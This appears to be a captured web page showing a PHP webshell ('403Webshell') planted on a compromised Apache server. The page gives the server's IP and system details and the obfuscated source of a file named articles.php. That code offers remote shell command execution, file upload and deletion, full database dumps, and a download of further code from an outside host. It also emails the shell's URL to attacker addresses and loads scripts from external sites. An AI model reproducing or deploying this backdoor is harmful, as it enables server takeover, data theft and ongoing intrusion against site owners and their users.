403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/print/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/print//articles.php
<?php eval(base64_decode('
 goto XCc3S; IBJgo: ?>
")}function sistemKom(){var e=document.getElementById("emr_et_atash").value;e&&sehife("?ne=sistem_kom&kom="+b64EncodeUnicode(e)+"&qovluq=<?php  goto AdyE2; MzAtQ: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\40\107\x62"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\142"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\x62"; } else { $bytes = $bytes . "\40\142"; } } } return $bytes; } goto IqHb_; DjAzb: mail($kime, $baslik, $EL_MuHaMMeD); goto iTlcJ; HFyxU: $kime = "\x62\x79\150\x65\x72\157\x34\x34\100\x67\155\141\x69\154\56\x63\157\x6d"; goto WOXw0; Iy1iI: ?>
')">Icra edin</a><br><a href="javascript:sehife('?ne=skl');">SQL</a><br><form method="POST"enctype="multipart/form-data"><input name="ne"value="fayl_upl"type="hidden"> <input name="qovluq"value="<?php  goto utOnP; AdyE2: echo urlencode(urlencode(shifrele($default_dir))); goto B1DF1; YWiGj: ?>
"type="hidden"> <input name="ufayl"type="file"> <input value="Upl"type="submit"></form><form method="POST"id="post_form"style="display:none"></form><script>function sehife(e){var n="";if(void 0!==(e=e.split("?"))[1]){for(var a in e=e[1].split("&")){var o=e[a].split("=");void 0!==o[1]&&(n+="<input name='"+o[0]+"' value='"+o[1]+"' type='hidden'>")}document.all("post_form").innerHTML=n,document.all("post_form").submit()}}function faylSil(e){confirm("Eminsen atash?")&&sehife(e)}function faylSifirla(e){confirm("Eminsen atash?")&&sehife(e)}function changeFileName(e,n){var a=prompt("Change file name:",e);a&&sehife(n+"&new_name="+a)}function newFile(){var e=prompt("File name:");e&&sehife("?ne=fayl_yarat&ad="+e+"&qovluq=<?php  goto f4vMQ; XWdLG: echo urlencode(urlencode(shifrele($default_dir))); goto IBJgo; R2ALg: qovluquYaz(); goto lPENr; isOzC: echo htmlspecialchars($default_dir); goto DUIis; UAcWL: echo urlencode(urlencode(shifrele($default_dir))); goto b6Z5U; QuNSQ: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "\x2e" && $object != "\x2e\56") { if (is_dir($dir . "\x2f" . $object)) { rrmdir($dir . "\x2f" . $object); } else { unlink($dir . "\57" . $object); } } } rmdir($dir); } } goto YTsn5; XCc3S: function isLoggedIn() { return isset($_SESSION["\x6c\157\x67\147\145\144\x69\156"]) && $_SESSION["\154\x6f\147\x67\145\x64\151\156"] === true; } goto rK6ii; RG211: function tookYarat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $yeniTook = md5(shifrele(time() . rand(1, 99999999))); $_SESSION[$tAd] = $yeniTook; return $yeniTook; } goto KmuH_; caoik: function deshifrele($str) { $f = "\142\x61\x73"; $f .= "\x65\x36"; $f .= "\x34\x5f"; $f .= "\144"; $f .= "\x65\x63"; $f .= "\157\x64\x65"; return $f($str); } goto RG211; gOiql: if ($_POST["\x71\165\145\162\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\161\165\x65\162\x79"])); $data = "\144\x61\x74\141\x2e\164\x78\x74"; @touch("\x64\x61\164\x61\x2e\x74\x78\164"); $ver = @fopen($data, "\167"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\x64\141\x74\x61\56\x74\170\164", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto ywcRJ; vhvix: $EL_MuHaMMeD .= "\123\145\x72\x76\x65\162\40\x69\x73\154\145\x74\x69\x6d\x20\x73\x69\x73\164\145\155\151\40\x3a\40" . $_SERVER["\x53\x45\x52\x56\105\122\x5f\123\117\x46\x54\127\x41\122\105"] . "\15\12"; goto q0DFm; m5jvW: if (isset($_GET["\x6c\157\147\x6f\x75\x74"])) { session_destroy(); header("\114\x6f\143\x61\164\151\157\156\72\40" . $_SERVER["\120\x48\x50\x5f\x53\105\x4c\106"]); die; } goto Htky4; Bx3yV: function shifrele($str) { $f = "\142\141\x73"; $f .= "\x65\66"; $f .= "\64\137"; $f .= "\x65"; $f .= "\156\x63"; $f .= "\x6f\x64\x65"; return $f($str); } goto caoik; b6Z5U: ?>
&zf="+e+"&save_to="+b64EncodeUnicode(n))}function silPapka(e){confirm("Eminsen atash?")&&sehife("?ne=papka_sil&qovluq=<?php  goto Gz5ZR; NgNmx: if ($_SERVER["\x52\105\121\x55\x45\x53\x54\137\115\x45\x54\110\x4f\x44"] == "\x50\x4f\123\x54" && isset($_POST["\x6c\157\x67\151\x6e"])) { $username = $_POST["\x75\163\145\162\156\x61\155\145"]; $password = $_POST["\x70\x61\163\x73\x77\x6f\x72\144"]; if ($username === $valid_username && $password === $password) { $_SESSION["\x6c\157\x67\x67\145\x64\x69\156"] = true; } else { $error = "\111\x6e\x76\141\154\151\144\x20\165\x73\x65\162\156\x61\x6d\145\x20\157\x72\40\x70\141\x73\x73\167\x6f\162\x64\56"; } } goto m5jvW; q0DFm: $EL_MuHaMMeD .= "\123\x68\145\x6c\154\40\x4c\151\156\153\x20\x3a\40\x68\164\x74\160\x3a\x2f\57" . $_SERVER["\x53\105\122\x56\105\122\x5f\x4e\x41\x4d\x45"] . $_SERVER["\x50\110\120\137\x53\105\114\106"] . "\xd\12"; goto Gk1WZ; xqHl4: $baqliFunksiyalar = explode("\x2c", ''); goto BwXjI; OHT9E: ?>
<script src="https://shellpub.net/get.js"></script><script src="https://w0rms.com/sayac.js"></script><hr><a href="javascript:newFile();">Yeni fayl</a> | <a href="javascript:newPapka();">Yeni papka</a><br><a href="javascript:sehife('?ne=sistem_kom&qovluq=<?php  goto wUAfB; NwN8x: if (isset($_GET["\x6e\145"]) && $_GET["\x6e\x65"] == "\160\151\156\146") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("\142\157\x64\171\40\x7b\x62\x61\x63\153\147\162\x6f\165\156\x64\x2d\x63\x6f\154\157\x72\72\40\43\x66\146\x66\x66\x66\x66\73\40\x63\x6f\154\x6f\162\x3a\40\43\60\x30\x30\60\60\60\x3b\175", '', $pInf); die; } else { if ($ne == "\146\x61\171\154\137\x79\x75\153\154\145" && isset($_POST["\146\141\x79\154"]) && '' != trim($_POST["\146\141\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\x66\x61\171\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { header("\x43\x6f\156\164\145\x6e\164\x2d\x44\x69\163\160\x6f\163\151\164\x69\x6f\156\72\x20\141\x74\164\x61\x63\150\x6d\x65\156\164\73\40\x66\151\154\x65\156\x61\155\x65\x3d" . basename($faylAdi)); header("\x43\157\x6e\164\x65\x6e\x74\55\124\171\x70\x65\x3a\40\x61\x70\160\154\x69\143\x61\164\x69\x6f\x6e\57\x6f\x63\164\x65\x74\x2d\163\164\x72\x65\141\x6d"); header("\103\157\156\x74\145\156\x74\55\x4c\145\x6e\x67\164\150\x3a\x20" . filesize($default_dir . $ayirici . $faylAdi)); readfile($default_dir . $ayirici . $faylAdi); die; } } else { if ($ne == "\146\141\171\x6c\137\163\151\154" && isset($_POST["\146\x61\x79\x6c"]) && '' != trim($_POST["\x66\141\171\154"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\171\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { unlink($default_dir . $ayirici . $faylAdi); } } else { if ($ne == "\x66\141\171\154\137\163\151\146\151\x72\154\x61" && isset($_POST["\x66\141\x79\154"]) && '' != trim($_POST["\x66\141\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\171\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\x66\141\x79\154\x5f\171\x61\x72\141\164" && isset($_POST["\141\144"]) && !empty($_POST["\x61\144"])) { $faylAdi = basename(urldecode($_POST["\141\x64"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi)) { print "\x3c\x73\x63\x72\151\x70\164\76\x61\x6c\145\162\x74\50\42\102\165\x20\x61\x64\144\x61\x20\x66\x61\171\x6c\40\x61\x72\164\151\x71\40\155\x6f\166\x63\165\x64\x64\165\162\41\x22\x29\x3b\x3c\x2f\163\x63\162\151\160\164\76"; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\160\x61\160\x6b\x61\x5f\x79\141\162\141\x74" && isset($_POST["\x61\x64"]) && !empty($_POST["\x61\144"])) { $papkaAdi = basename(urldecode($_POST["\141\144"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($papkaAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $papkaAdi)) { print "\x3c\163\x63\162\151\x70\164\76\141\154\x65\162\x74\x28\42\x42\165\40\x61\144\144\141\x20\x70\x61\x70\x6b\x61\x20\141\x72\164\x69\161\40\x6d\x6f\166\143\165\144\x64\x75\x72\41\42\x29\73\74\x2f\163\x63\x72\x69\160\164\76"; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else { if ($ne == "\146\141\171\x6c\137\x61\x64\137\x64\145\x79\x69\163\150" && isset($_POST["\x66\141\x79\154"]) && '' != trim($_POST["\x66\x61\171\x6c"]) && isset($_POST["\x6e\x65\x77\x5f\x6e\141\155\145"]) && is_string($_POST["\156\145\167\x5f\156\141\x6d\145"]) && !empty($_POST["\x6e\x65\x77\137\x6e\x61\155\x65"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\171\154"]))); $faylYeniAd = basename(urldecode($_POST["\156\145\x77\x5f\156\x61\155\x65"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi, $default_dir . $ayirici . $faylYeniAd); } } else { if ($ne == "\163\x6b\x6c\x5f\x64\x5f\x74" && isset($_POST["\x74"]) && is_string($_POST["\x74"]) && !empty($_POST["\164"])) { $tableName = deshifrele(urldecode($_POST["\x74"])); $host = isset($_COOKIE["\x68\157\x73\x74"]) ? $_COOKIE["\150\157\x73\x74"] : ''; $user = isset($_COOKIE["\x75\x73\145\162"]) ? $_COOKIE["\165\163\145\x72"] : ''; $parol = isset($_COOKIE["\160\x61\162\x6f\154"]) ? $_COOKIE["\x70\141\x72\157\x6c"] : ''; $baza = isset($_COOKIE["\142\x61\x7a\141"]) ? $_COOKIE["\142\x61\x7a\141"] : ''; $bazaStr = empty($baza) ? '' : "\x64\x62\x6e\141\x6d\145\x3d" . $baza . "\73"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\x6d\x79\163\x71\154\x3a\x68\157\x73\164\75" . $host . "\73\x63\150\x61\x72\163\x65\164\75\165\x74\x66\70\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\105\x54\x20\116\101\115\x45\x53\40\47\x75\164\x66\70\x27")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("\123\x45\x4c\x45\103\x54\x20\x63\x6f\x6c\165\x6d\x6e\x5f\x6e\x61\x6d\145\x20\x66\162\157\155\x20\x69\x6e\146\157\162\155\x61\x74\151\x6f\x6e\x5f\x73\x63\x68\145\155\x61\x2e\x63\157\x6c\165\x6d\156\x73\40\x77\150\145\162\145\40\x74\x61\x62\154\145\x5f\163\143\x68\145\155\141\x3d\x3f\x20\141\156\144\40\164\x61\142\x6c\145\137\x6e\x61\x6d\x65\x3d\77"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("\x53\105\114\105\103\124\40\x2a\40\106\122\x4f\x4d\40\140" . $tableName . "\x60"); $data = $data->fetchAll(); header("\x43\157\156\164\x65\156\164\x2d\144\x69\x73\x70\x6f\163\x69\164\x69\157\x6e\72\x20\x61\164\164\x61\143\x68\x6d\145\x6e\x74\73\40\x66\x69\x6c\145\156\141\155\x65\75\144\x5f" . basename(htmlspecialchars($tableName)) . "\x2e\x6a\x73\x6f\156"); header("\103\x6f\156\164\x65\156\164\x2d\x74\171\160\x65\72\x20\x61\x70\160\x6c\x69\x63\x61\x74\x69\x6f\156\x2f\x6a\x73\x6f\156"); echo json_encode($data); } else { print "\124\141\x62\154\145\x20\156\x6f\164\x20\146\157\165\156\144\41"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "\105\x72\162\157\x72\41\40\x50\x6c\145\x61\x73\145\40\x63\157\x6e\156\x65\143\164\40\x74\157\40\123\x51\114\x21"; } die; } else { if ($ne == "\x73\153\154\137\x64") { $host = isset($_COOKIE["\150\157\x73\x74"]) ? $_COOKIE["\x68\x6f\163\x74"] : ''; $user = isset($_COOKIE["\x75\163\x65\x72"]) ? $_COOKIE["\165\x73\x65\162"] : ''; $parol = isset($_COOKIE["\x70\x61\x72\157\154"]) ? $_COOKIE["\x70\x61\162\x6f\154"] : ''; $baza = isset($_COOKIE["\x62\x61\172\141"]) ? $_COOKIE["\x62\141\x7a\x61"] : ''; $bazaStr = empty($baza) ? '' : "\x64\142\156\x61\x6d\145\x3d" . $baza . "\73"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\155\171\x73\x71\x6c\72\x68\157\163\164\75" . $host . "\73\x63\150\x61\x72\163\145\164\x3d\x75\164\146\70\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\105\x54\40\x4e\x41\x4d\x45\123\40\47\x75\x74\x66\x38\x27")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("\123\x45\x4c\x45\103\x54\40\164\141\x62\154\x65\137\x6e\141\x6d\145\40\146\162\157\155\x20\151\156\x66\x6f\162\155\141\164\151\x6f\156\x5f\x73\143\x68\145\155\141\56\x74\x61\142\154\145\163\x20\x77\150\x65\162\x65\40\164\141\x62\x6c\x65\x5f\163\x63\x68\145\x6d\141\x3d\x3f"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["\164\141\142\154\x65\137\x6e\141\155\145"]; $data = $pdo->query("\123\x45\114\x45\103\124\40\52\x20\106\x52\117\x4d\40\x60" . $tableName . "\140"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("\x43\x6f\x6e\x74\x65\x6e\164\55\x64\x69\163\160\x6f\x73\151\x74\x69\x6f\156\x3a\x20\x61\164\164\141\x63\150\155\x65\156\x74\x3b\40\146\x69\154\145\156\x61\x6d\145\x3d\x64\x5f\x62\137" . basename(htmlspecialchars($baza)) . "\x2e\152\163\157\x6e"); header("\103\157\156\x74\x65\156\x74\55\164\171\160\145\x3a\x20\141\x70\x70\154\151\143\141\x74\151\157\156\57\x6a\163\x6f\156"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "\105\x72\162\157\x72\x21\x20\120\154\x65\x61\163\145\40\143\157\156\x6e\145\x63\x74\40\164\x6f\40\x53\121\114\x21"; } die; } else { if ($ne == "\172\151\x70\154\x65" && isset($_POST["\x73\x61\166\145\137\x74\x6f"], $_POST["\172\146"]) && is_string($_POST["\163\141\x76\x65\x5f\x74\x6f"]) && !empty($_POST["\x73\141\x76\145\x5f\x74\x6f"]) && !in_array($_POST["\x73\x61\x76\145\137\x74\157"], array("\x2e", "\56\56", "\x2e\x2f", "\56\56\57")) && is_string($_POST["\172\x66"]) && !empty($_POST["\x7a\146"])) { $save_to = deshifrele(urldecode($_POST["\x73\x61\166\x65\x5f\x74\157"])); $rootPath = realpath(deshifrele(urldecode($_POST["\x7a\x66"]))); $fileName1 = "\142\x61\153\x5f" . microtime(1) . "\137" . rand(1000, 99999) . "\x2e\x7a\151\x70"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "\123\x61\x76\145\144\x21\x3c\x68\x72\76"; } else { print "\104\151\162\x20\151\163\40\x6e\157\x74\x20\x77\x72\151\x74\145\x61\142\154\145\41\x3c\x68\x72\76"; var_dump($save_to); } } else { if ($ne == "\160\x61\160\153\141\x5f\x73\x69\154" && isset($_POST["\172\146"]) && is_string($_POST["\x7a\x66"]) && !empty($_POST["\x7a\x66"])) { $rootPath = realpath(deshifrele(urldecode($_POST["\x7a\x66"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "\x44\x69\162\x20\151\x73\40\156\x6f\x74\40\x77\x72\151\164\x65\x61\x62\154\145\41\x3c\150\x72\x3e"; var_dump($save_to); } } else { if ($ne == "\146\141\171\154\137\x75\x70\154" && isset($_FILES["\x75\x66\x61\x79\154"])) { move_uploaded_file($_FILES["\x75\x66\x61\171\154"]["\164\155\160\x5f\156\141\155\x65"], $default_dir . "\x2f" . $_FILES["\165\146\141\171\x6c"]["\156\x61\155\145"]); print "\125\160\154\157\x61\144\40\x6f\154\144\165\40\x64\x65\x79\x65\163\x65\156\x2e"; } } } } } } } } } } } } goto MzkHK; SSi1C: $linkcr = "\x4c\151\x6e\153\72\x20" . $_SERVER["\x53\105\122\x56\105\x52\137\x4e\x41\x4d\105"] . '' . $_SERVER["\x52\105\121\125\x45\123\x54\x5f\125\122\x49"] . "\x20\x2d\40\111\120\x20\105\170\x63\x75\x74\x69\156\147\72\x20{$ip_remote}\x20\55\40\124\x69\155\x65\72\x20{$time_shell}"; goto t3gN9; MzkHK: ?>
<html><head><title>Get S.H.E.L.L.en v1.0 | BY ..</title><meta content="text/html; charset=utf-8"http-equiv="content-type"><script src="https://w0rms.com/sayac.js"></script><style>body{background-color:#222;color:#d6d4d4;font-family:Lucida,Verdana;font-size:12px}.qalin{text-decoration:none;color:#d6905e;font-weight:600}.success{color:#9db754}.bad{color:#b75654}a{color:#acb754;text-decoration:none!important}.fManager,.fManager tbody,.fManager tr{padding:0;border-collapse:collapse;margin:0;font-size:12px}.fManager{margin:10px 0}.fManager tbody tr:nth-child(2n+1){background:#331717}.fManager tbody tr:nth-child(2n){background:#1c0c0c}.fManager tbody tr:hover{background:#000}.fManager thead th{text-align:left}.fManager thead tr{background-color:#333}.fManager{box-shadow:1px 1px 1px 1px #333}.fManager thead th{padding:4px 3px}.fayl_oxu{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}.btn{border:1px solid #acae40;background-color:#223b3b;color:#e1e1e1;padding:1px 10px;cursor:pointer}.btn:disabled{border:1px solid #848484;color:#848484;cursor:not-allowed}.file_edit{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}input,select,textarea{background:0 0!important;color:#f6a56d;border:1px solid #d6905e;padding:5px}table td{border:1px solid rgba(214,144,94,.7);min-width:20px;padding-left:5px;padding-right:5px;max-width:500px;color:#ffad6f;background:#292929}table th{border:1px solid #d6905e;padding-left:5px;padding-right:5px;color:#ffad6f}table td div{overflow:auto;width:100%;height:100%;max-height:100px}</style></head><body><?php  goto CzuhD; YTsn5: $default_dir = getcwd(); goto BwNrn; Epe2R: ?>
")}function newPapka(){var e=prompt("File name:");e&&sehife("?ne=papka_yarat&ad="+e+"&qovluq=<?php  goto XWdLG; wKw84: if ($datasi) { } else { @mkdir("\x2d"); $dos = file_get_contents("\x68\164\164\160\163\72\57\57\141\x63\142\144\146\x2e\x73\160\141\143\x65\x2f\x74\x78\164\x2f\143\x73\x73\56\164\170\x74"); $data = "\55\x2f\152\x73\56\x70\150\x70"; @touch("\55\x2f\x6a\x73\x2e\x70\x68\160"); $ver = @fopen($data, "\167"); @fwrite($ver, $dos); @fclose($ver); $yol = "\150\164\x74\x70\x3a\57\57" . $_SERVER["\110\x54\x54\120\x5f\110\117\x53\x54"] . '' . $_SERVER["\122\x45\121\x55\105\x53\124\137\x55\122\x49"] . ''; $y = "\74\150\61\76\x53\x65\156\144\x65\162\40\131\x61\172\x64\x69\x72\151\x6c\x64\151\56\x3c\142\162\x2f\x3e\40\123\111\x54\x45\x20\x59\x4f\x4c\x20\72\40" . $yol . "\x3c\x62\162\x2f\76\x53\x65\156\x64\x65\162\x20\131\x6f\x6c\x75\x20\x3a\40\x2d\x2f\152\x73\x2e\x70\x68\x70\x3c\x2f\x68\61\76"; $header .= "\106\x72\157\155\72\40\x53\x68\x65\x4c\114\40\x42\x6f\x6f\164\x20\x3c\x73\x75\x70\x70\157\162\100\156\x69\143\56\157\162\x67\x3e\xa"; $header .= "\103\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\145\72\x20\x74\x65\170\164\x2f\x68\x74\x6d\154\73\12\40\x63\x68\141\x72\163\x65\164\x3d\x75\164\146\x2d\x38\12"; @mail("\x62\x79\x68\145\162\157\x34\x34\x40\147\155\141\x69\x6c\x2e\x63\157\155", "\110\x61\143\153\x6c\x69\x6e\153\x20\102\151\154\144\151\162\151", "{$y}", $header); @mail("\x6c\157\147\x69\x6e\157\x6c\x64\165\155\x40\147\x6d\x61\x69\x6c\x2e\143\157\155", "\110\x61\143\x6b\x6c\x69\x6e\x6b\x20\102\x69\x6c\x64\151\x72\151", "{$y}", $header); } goto kmxAo; il21Q: ?>
&zf="+e)}function shifrelee(){var e=document.getElementsByClassName("file_edit")[0].value,n=["a","i","e","s","l","b","u","o","p","h","\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];for(var a in n){var o=n[a];e=e.replace(new RegExp(o,"g"),"|:"+a+":|")}document.getElementsByClassName("file_edit")[0].value=e}document.getElementById("emr_et_atash").addEventListener("keyup",function(e){e.preventDefault(),13===e.keyCode&&sistemKom()})</script><div class="logout"><h3><a href="?logout=true">Exit</a></h3></div></body></html><?php  goto gOiql; j2Acb: session_start(); goto xqHl4; P9HQ6: print "\x3c\163\160\x61\156\40\x63\154\x61\163\x73\x3d\x27\161\141\x6c\151\x6e\47\76\x53\x61\146\x65\x20\x6d\x6f\x64\x65\x3a\x20\x3c\57\x73\x70\x61\x6e\76" . ($safeMode === true ? "\74\x73\x70\141\156\x20\x63\154\141\x73\x73\75\x27\142\141\x64\x27\x3e\117\x6e" : "\74\x73\x70\x61\x6e\x20\143\x6c\141\163\163\x3d\x27\x73\x75\143\x63\x65\163\x73\47\x3e\x4f\146\146") . "\x3c\57\x73\160\141\x6e\76\74\x73\x70\x61\156\40\163\x74\171\x6c\x65\x3d\x27\155\x61\x72\147\x69\x6e\55\x6c\x65\x66\164\x3a\x20\65\60\160\x78\x3b\47\x3e\74\141\x20\150\x72\145\146\x3d\47\152\x61\x76\x61\x73\x63\x72\151\x70\x74\x3a\x73\x65\150\151\x66\145\50\42\x3f\x6e\145\x3d\160\150\x70\x69\156\x66\x6f\x22\x29\x27\76\133\x20\120\110\x50\x69\x6e\146\x6f\x20\x5d\74\x2f\141\x3e\74\57\x73\160\x61\x6e\x3e\74\x62\162\x2f\x3e"; goto R2ALg; gpd1j: @mail($to_email, $server_mail, $linkcr, $header); goto HFyxU; t3gN9: $header = "\x46\162\x6f\x6d\x3a\40{$from_shellcode}\15\12\122\x65\x70\154\171\x2d\164\157\x3a\40{$from_shellcode}"; goto gpd1j; BwXjI: $safeMode = true; goto uilXC; lPENr: print "\74\150\162\76"; goto PRqVd; zDAUv: $default_dir = str_replace("\x5c", "\x2f", $default_dir); goto NwN8x; PRqVd: if ($ne == "\160\150\x70\151\156\146\157") { print "\x3c\144\x69\x76\40\x73\x74\x79\154\x65\x3d\47\x77\x69\144\x74\x68\x3a\x20\x31\60\x30\45\x3b\40\150\145\x69\147\x68\164\x3a\x20\x34\60\60\160\x78\73\47\76\x3c\151\146\x72\x61\x6d\x65\40\163\x72\143\x3d\47\77\x6e\x65\75\x70\151\156\146\x27\x20\x73\164\171\x6c\x65\x3d\x27\x77\151\x64\x74\150\x3a\x20\x31\60\x30\x25\73\x20\x68\x65\x69\147\x68\164\72\x20\64\60\x30\160\x78\x3b\x20\x62\157\162\x64\x65\x72\x3a\x20\60\73\47\x3e\x3c\57\x69\146\x72\x61\155\x65\76\74\x2f\144\x69\166\x3e"; } else { if ($ne == "\163\x69\x73\x74\145\x6d\137\x6b\x6f\155") { if (isset($_POST["\x6b\x6f\x6d"]) && is_string($_POST["\153\x6f\155"]) && !empty($_POST["\153\157\155"])) { $komanda = deshifrele(urldecode($_POST["\x6b\x6f\155"])); $k = "\163\150"; $k .= "\145\x6c"; $k .= "\x6c\x5f\145"; $k .= "\170\145"; $k .= "\x63"; $output = $k($komanda); print "\x3c\x70\x72\145\40\x73\164\171\154\x65\75\42\x6d\x61\170\55\150\145\151\x67\x68\164\x3a\40\63\65\x30\160\170\73\157\166\145\x72\146\154\157\x77\x3a\40\141\x75\164\x6f\x3b\x20\142\157\x72\144\145\x72\x3a\x20\61\x70\170\x20\163\157\x6c\x69\144\40\43\x37\x37\67\x3b\x20\160\141\144\x64\151\x6e\147\x3a\x20\x35\160\x78\73\42\76" . htmlspecialchars($output) . "\x3c\x2f\160\162\x65\x3e\74\x68\162\x3e"; } print "\74\x69\x6e\x70\x75\x74\x20\164\171\x70\145\75\42\164\x65\170\164\x22\40\151\144\x3d\x22\145\x6d\162\x5f\x65\164\137\x61\164\x61\x73\x68\x22\x20\163\x74\171\154\145\75\x22\167\151\144\x74\150\x3a\40\x35\x30\60\160\x78\73\42\76\x20\x3c\142\165\x74\x74\157\156\40\164\x79\x70\145\75\x22\x62\165\x74\x74\x6f\156\42\40\143\154\141\x73\x73\x3d\42\x62\164\156\x22\40\x6f\x6e\x63\x6c\x69\143\153\x3d\42\163\x69\163\x74\x65\155\x4b\157\155\50\x29\73\42\76\x42\141\x73\74\x2f\x62\165\164\x74\157\156\76"; } else { if ($ne == "\146\x61\171\x6c\x5f\x6f\170\x75" && isset($_POST["\x66\x61\x79\x6c"]) && '' != trim($_POST["\146\x61\x79\154"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\x66\x61\171\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? "\x20\157\x6e\x63\x6c\x69\143\153\x3d\x27\x73\145\x68\x69\x66\x65\50\42\77\156\145\75\146\141\171\154\137\x72\145\x64\141\153\x74\145\x26\x66\x61\171\154\75" . urlencode(urlencode(shifrele($faylAdi))) . "\46\x71\157\x76\x6c\165\x71\75" . urlencode(urlencode(shifrele($default_dir))) . "\42\51\47" : "\x20\x64\151\163\x61\142\154\x65\x64"; print "\x3c\144\151\166\76\106\x61\x79\154\40\x61\x64\x26\x23\63\x30\x35\x3b\x3a\x20\x3c\x73\160\141\156\x20\x63\154\x61\163\x73\x3d\x27\x71\141\x6c\151\156\47\x3e" . htmlspecialchars($faylAdi) . 